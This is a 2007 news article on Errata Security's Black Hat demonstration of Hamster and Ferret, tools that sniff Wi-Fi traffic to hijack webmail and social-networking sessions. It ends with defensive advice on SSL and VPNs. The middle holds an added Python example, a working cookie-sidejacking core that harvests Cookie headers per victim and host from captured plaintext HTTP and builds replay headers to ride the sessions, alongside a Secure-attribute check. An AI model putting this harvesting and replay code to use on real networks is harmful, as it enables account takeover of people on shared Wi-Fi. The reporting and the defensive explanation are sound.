Researchers at Errata Security have developed tools that
sniff out users of Web-based email and social-networking sites over
Wi-Fi and hijack their sessions.
Users of Google's Gmail, Microsoft's Hotmail and Yahoo Mail are
at risk, as are users of Facebook and other Web 2.0
social-networking Web sites, said Robert Graham, a security
researcher and CEO of Errata Security.
Software-as-a-service (SaaS) offerings such as Salesforce.com
are also at risk, Graham said.
"Web 2.0 is fundamentally broken," Graham said. "Using the tools
it's easy to hijack other people's credentials. It's a fundamental
flaw in Web 2.0."
Two tools, created by Graham and David Maynor, chief technology
officer of Errata, are called Hamster and Ferret. They work in
tandem over Wi-Fi to sniff out URLs and cookies and then store and
translate the information to allow the attacker to open a Web-based
email session without detection.
The sniffer detects the cookie data being transferred between a
wireless router and a computer. Cookies are used for authenticating
a user and can last for several years, allowing an attacker to
sniff out the information and store it for future use, Graham
said.
Graham demonstrated the tools during a session at Black Hat
2007, sniffing out URLs of users in attendance until he found a
Gmail user and quickly opened up the person's session. Although the
tools are still in their early stages of development (they lack an
easy-to-use installer and are buggy), Graham said he plans to make
them available for free download on his Web site.
The Black Hat session was called "Simple Solutions to Complex
Problems, from the Lazy Hacker's Handbook." The technique is a lazy
way to hack, Graham said, since a hacker could sit at a hotspot and
easily hijack sessions.
While a hacker can browse through a person's email and change
some settings, the hacker cannot change a password, because many
Web 2.0 applications require a second log-in, Graham said. Google
also lets users access their accounts over SSL, a feature that
will bar an attacker from gaining access, he said.
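The following is an added illustration of the technique the article describes (passively harvesting Cookie headers from plaintext HTTP on a shared Wi-Fi segment, storing them per victim and host, and building the header that replays the session), together with the cookie-attribute check behind the SSL point above. It is example code written for this page, not Hamster or Ferret, and not Errata's code. The captured requests, client addresses and hostnames are constructed placeholders; the function and class names are this example's own.

```python
"""Cookie sidejacking as described above: passively harvest Cookie headers
from plaintext HTTP requests seen on a shared Wi-Fi segment, keep them per
victim and host, and build the replay header that would open the same
session. All captured traffic below is constructed; hostnames are placeholders.
"""
from collections import defaultdict

# Constructed sample captures: (unix_time, client_ip, raw HTTP request).
# These are not real packets; they stand in for what a sniffer sees on an
# open hotspot where the sites are reached over plain HTTP.
CAPTURED_REQUESTS = [
    (1186000000, "10.0.0.12",
     b"GET /mail/ HTTP/1.1\r\nHost: mail.example.com\r\n"
     b"Cookie: SID=abc123; HSID=xyz789\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    (1186000005, "10.0.0.12",
     b"GET /home.php HTTP/1.1\r\nHost: social.example.net\r\n"
     b"Cookie: sess=deadbeef\r\n\r\n"),
    (1186000009, "10.0.0.31",
     b"GET /index.html HTTP/1.1\r\nHost: static.example.org\r\n\r\n"),
    (1186000020, "10.0.0.12",
     b"GET /mail/?ui=2 HTTP/1.1\r\nHost: mail.example.com\r\n"
     b"Cookie: SID=abc123; NEW=1\r\n\r\n"),
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers dict).

    Header names are lower-cased; returns None for anything that is not a
    well-formed request (the sniffer simply skips such packets)."""
    try:
        head, _, _body = raw.partition(b"\r\n\r\n")
        lines = head.decode("latin-1").split("\r\n")
        method, path, version = lines[0].split(" ", 2)
    except (ValueError, UnicodeDecodeError):
        return None
    if not version.startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value):
    """'SID=abc; HSID=xyz' -> {'SID': 'abc', 'HSID': 'xyz'}."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep and name:
            cookies[name] = val
    return cookies


class SidejackJar:
    """Cookies harvested per (victim IP, host), merged across captures so the
    jar always holds the latest value of every cookie name seen."""

    def __init__(self):
        self._jar = defaultdict(dict)   # (client_ip, host) -> {name: value}
        self._seen = {}                 # (client_ip, host) -> last unix_time

    def ingest(self, when, client_ip, raw):
        parsed = parse_request(raw)
        if parsed is None:
            return False
        _method, _path, headers = parsed
        host, cookie = headers.get("host"), headers.get("cookie")
        if not host or not cookie:
            return False                # nothing worth keeping
        key = (client_ip, host.lower())
        self._jar[key].update(parse_cookie_header(cookie))
        self._seen[key] = max(when, self._seen.get(key, 0))
        return True

    def victims(self):
        """Sorted list of (client_ip, host) pairs with a stored session."""
        return sorted(self._jar)

    def replay_header(self, client_ip, host):
        """The Cookie header an attacker would attach to ride the session."""
        cookies = self._jar.get((client_ip, host.lower()))
        if not cookies:
            return None
        return "Cookie: " + "; ".join(f"{k}={v}" for k, v in cookies.items())


def cookie_exposed_over_http(set_cookie_value):
    """Server-side check behind the SSL point: a cookie carrying the Secure
    attribute is only ever sent over HTTPS, so a Wi-Fi sniffer never sees
    it. Without Secure, the browser leaks it on any http:// request."""
    attrs = [p.strip().lower() for p in set_cookie_value.split(";")[1:]]
    return "secure" not in attrs


def harvest(captures=CAPTURED_REQUESTS):
    """Feed every constructed capture into a jar and return it."""
    jar = SidejackJar()
    for when, client_ip, raw in captures:
        jar.ingest(when, client_ip, raw)
    return jar


if __name__ == "__main__":
    jar = harvest()
    for client_ip, host in jar.victims():
        print(client_ip, host, jar.replay_header(client_ip, host))
```

Two details mirror the article's points: the jar merges cookies across captures, so a long-lived authentication cookie seen once can be stored and replayed later, and the request to `static.example.org` yields nothing because no cookie crossed the wire. The `Secure` attribute check is the server-side counterpart of the SSL advice: a site that serves its session cookie only over HTTPS and marks it `Secure` gives a hotspot sniffer nothing to replay.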
James Booseman, a San Jose, Calif.-based security architect who
attended the session, said he was surprised by the demonstration.
But Booseman said that taking the appropriate security steps when
on public Wi-Fi, such as using a virtual private network, can avoid
data leakage.
"It's about keeping yourself from being at risk," Booseman said.
"I bet there are many people out there who are wide open to this
kind of attack."